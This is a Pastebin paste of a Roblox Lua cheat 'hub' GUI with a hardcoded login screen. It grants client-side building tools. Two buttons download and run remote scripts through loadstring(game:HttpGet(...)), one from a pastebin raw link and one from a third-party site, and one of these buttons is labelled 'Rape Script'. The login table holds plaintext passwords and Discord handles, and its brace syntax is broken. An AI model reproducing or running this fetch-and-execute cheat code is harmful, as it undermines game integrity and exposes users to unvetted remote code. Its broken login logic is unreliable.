Advertisement
Guest User

Untitled

a guest
May 22nd, 2018
93
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 6.33 KB | None | 0 0
  1. -- Farewell infortality
  2. -- Revamp by ImFrostic, Version 2.8
  3.  
  4. -- Objects
  5.  
  6. local ScreenGui = Instance.new("ScreenGui")
  7. local Main = Instance.new("Frame")
  8. local TextLabel = Instance.new("TextLabel")
  9. local Close = Instance.new("TextButton")
  10. local Btools = Instance.new("TextButton")
  11. local Rape = Instance.new("TextButton")
  12. local TextButton = Instance.new("TextButton")
  13. local OpenFrame = Instance.new("Frame")
  14. local Open = Instance.new("TextButton")
  15.  
  16. -- Properties
  17.  
  18. ScreenGui.Parent = game.CoreGui
  19.  
  20. Main.Name = "Main"
  21. Main.Parent = ScreenGui
  22. Main.BackgroundColor3 = Color3.new(0.0784314, 1, 0.862745)
  23. Main.BorderColor3 = Color3.new(1, 0, 0.0156863)
  24. Main.BorderSizePixel = 7
  25. Main.Position = UDim2.new(0.473589003, 0, 0.164899886, 0)
  26. Main.Size = UDim2.new(0, 705, 0, 429)
  27. Main.Visible = false
  28.  
  29. TextLabel.Parent = Main
  30. TextLabel.BackgroundColor3 = Color3.new(1, 0, 0.0156863)
  31. TextLabel.BorderSizePixel = 0
  32. TextLabel.Position = UDim2.new(0.357779354, 0, 0, 0)
  33. TextLabel.Size = UDim2.new(0, 200, 0, 50)
  34. TextLabel.Font = Enum.Font.SourceSans
  35. TextLabel.Text = "Newtmannewt Hub v1.0"
  36. TextLabel.TextScaled = true
  37. TextLabel.TextSize = 14
  38. TextLabel.TextWrapped = true
  39.  
  40. Close.Name = "Close"
  41. Close.Parent = Main
  42. Close.BackgroundColor3 = Color3.new(1, 1, 1)
  43. Close.BackgroundTransparency = 1
  44. Close.BorderSizePixel = 0
  45. Close.Position = UDim2.new(0.87551868, 0, 0, 0)
  46. Close.Size = UDim2.new(0, 60, 0, 52)
  47. Close.Font = Enum.Font.SourceSans
  48. Close.Text = "X"
  49. Close.TextScaled = true
  50. Close.TextSize = 14
  51. Close.TextWrapped = true
  52.  
  53. Btools.Name = "Btools"
  54. Btools.Parent = Main
  55. Btools.BackgroundColor3 = Color3.new(0.215686, 0.188235, 1)
  56. Btools.Position = UDim2.new(0.380141854, 0, 0.186480179, 0)
  57. Btools.Size = UDim2.new(0, 168, 0, 54)
  58. Btools.Font = Enum.Font.SourceSans
  59. Btools.Text = "Btools"
  60. Btools.TextScaled = true
  61. Btools.TextSize = 14
  62. Btools.TextWrapped = true
  63.  
  64. Rape.Name = "Rape"
  65. Rape.Parent = Main
  66. Rape.BackgroundColor3 = Color3.new(1, 0.87451, 0.14902)
  67. Rape.Position = UDim2.new(0.641134739, 0, 0.199300691, 0)
  68. Rape.Size = UDim2.new(0, 165, 0, 43)
  69. Rape.Font = Enum.Font.SourceSans
  70. Rape.Text = "Rape Script"
  71. Rape.TextScaled = true
  72. Rape.TextSize = 14
  73. Rape.TextWrapped = true
  74.  
  75. TextButton.Parent = Main
  76. TextButton.BackgroundColor3 = Color3.new(1, 0.972549, 0.541176)
  77. TextButton.Position = UDim2.new(0.12340425, 0, 0.200466201, 0)
  78. TextButton.Size = UDim2.new(0, 165, 0, 43)
  79. TextButton.Font = Enum.Font.SourceSans
  80. TextButton.Text = "YourMumGay Hub (Needs Login)"
  81. TextButton.TextScaled = true
  82. TextButton.TextSize = 14
  83. TextButton.TextWrapped = true
  84.  
  85. OpenFrame.Name = "OpenFrame"
  86. OpenFrame.Parent = ScreenGui
  87. OpenFrame.BackgroundColor3 = Color3.new(1, 1, 1)
  88. OpenFrame.Position = UDim2.new(0.884255946, 0, 0.91166079, 0)
  89. OpenFrame.Size = UDim2.new(0, 154, 0, 75)
  90. OpenFrame.Visible = false
  91.  
  92. Open.Name = "Open"
  93. Open.Parent = OpenFrame
  94. Open.BackgroundColor3 = Color3.new(1, 1, 1)
  95. Open.BorderSizePixel = 0
  96. Open.Size = UDim2.new(0, 154, 0, 75)
  97. Open.Font = Enum.Font.SourceSans
  98. Open.Text = "Open"
  99. Open.TextScaled = true
  100. Open.TextSize = 14
  101. Open.TextWrapped = true
  102.  
  103. local s = {} setmetatable(s,{__index = function(t,n) t[n] = game:GetService(n) return t[n] end})
  104. local new = function(a,b,c) local d = Instance.new(a,b) for i,v in pairs(c or {}) do d[i] = v end return d end
  105. local u,v,c = UDim2.new,Vector3.new,Color3.fromRGB
  106.  
  107. if s.CoreGui:FindFirstChild("LoginGui") then s.CoreGui.LoginGui:destroy() end
  108. local gui = new("ScreenGui",s.CoreGui,{Name = "LoginGui"})
  109.  
  110. local frame = new("Frame",gui,{Style = 3})
  111.  
  112. frame:TweenSizeAndPosition(u(.3,0,.1,0),u(.35,0,.65,0),"Out","Bounce",3)
  113. wait(3)
  114.  
  115. local user = new("TextBox",frame,{Text = "",Font = "Arcade",TextColor3 = Color3.new(0,0,0),TextStrokeTransparency = 0,TextStrokeColor3 = Color3.new(1,1,1),TextScaled = true,BackgroundTransparency = .7})
  116. local pass = new("TextBox",frame,{Text = "",Font = "Arcade",TextColor3 = Color3.new(0,0,0),TextStrokeTransparency = 0,TextStrokeColor3 = Color3.new(1,1,1),TextScaled = true,BackgroundTransparency = .7})
  117. local login = new("TextButton",frame,{Text = "Login",Font = "Arcade",TextColor3 = Color3.new(0,0,0),TextStrokeTransparency = 0,TextStrokeColor3 = Color3.new(1,1,1),TextScaled = true,BackgroundTransparency = .7})
  118. local database = {-- loadstring(game:HttpGet("http://logindatabaseidk.com",true))()
  119. User1 = {
  120. ["Name"] = "newtmannewt",
  121. ["Pass"] = "newt6615",
  122. ["Discord"] = "asssew#5973"
  123. }};
  124. User2 = {
  125. ["Name"] = "A6dsw2",
  126. ["Pass"] = "Jk672S",
  127. ["Discord"] = "Quite Crap#4148"
  128. }}
  129.  
  130. user:TweenSizeAndPosition(u(.9,0,.425,0),u(0.05,0,.05,0),"Out","Bounce")
  131. pass:TweenSizeAndPosition(u(.9,0,.425,0),u(0.05,0,.5,0),"Out","Bounce")
  132. login:TweenSizeAndPosition(u(.8,0,.5,0),u(.1,0,1.2,0),"Out","Bounce")
  133.  
  134. local userTab = nil
  135. local username = ""
  136. local passTab = nil
  137. local password = ""
  138.  
  139. user.FocusLost:connect(function()
  140. for i,v in pairs(database) do
  141. if v.Name:lower() == user.Text:lower() then
  142. userTab = v
  143. username = v.Name
  144. end end
  145. if userTab == passTab and userTab ~= nil and userTab.Name == username and userTab.Pass == password then
  146. OpenFrame.Visible = true
  147. gui:destroy()
  148. end end)
  149.  
  150. pass.FocusLost:connect(function()
  151. for i,v in pairs(database) do
  152. if v.Name:lower() == user.Text:lower() then
  153. passTab = v
  154. password = v.Pass
  155. end end
  156. if userTab == passTab and userTab ~= nil and userTab.Name == username and userTab.Pass == password then
  157. OpenFrame.Visible = true
  158. gui:destroy()
  159. end end)
  160.  
  161. -- Scripts
  162.  
  163. Open.MouseButton1Click:connect(function()
  164. Main.Visible = true
  165. end)
  166.  
  167. Close.MouseButton1Click:connect(function()
  168. Main.Visible = false
  169. end)
  170.  
  171. Btools.MouseButton1Click:connect(function()
  172. local tool1 = Instance.new("HopperBin",game.Players.LocalPlayer.Backpack)
  173. local tool2 = Instance.new("HopperBin",game.Players.LocalPlayer.Backpack)
  174. local tool3 = Instance.new("HopperBin",game.Players.LocalPlayer.Backpack)
  175. local tool4 = Instance.new("HopperBin",game.Players.LocalPlayer.Backpack)
  176. local tool5 = Instance.new("HopperBin",game.Players.LocalPlayer.Backpack)
  177. tool1.BinType = "Clone"
  178. tool2.BinType = "GameTool"
  179. tool3.BinType = "Hammer"
  180. tool4.BinType = "Script"
  181. tool5.BinType = "Grab"
  182. end)
  183.  
  184. Rape.MouseButton1Click:connect(function()
  185. loadstring(game:HttpGet(("http://pastebin.com/raw/ZY9uBcyL"), true) )()
  186. end)
  187.  
  188. TextButton.MouseButton1Click:connect(function()
  189. loadstring(game:HttpGet("https://urmomgayhub.xyz/SZCPRIPSD/script.php", true))()
  190. end)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement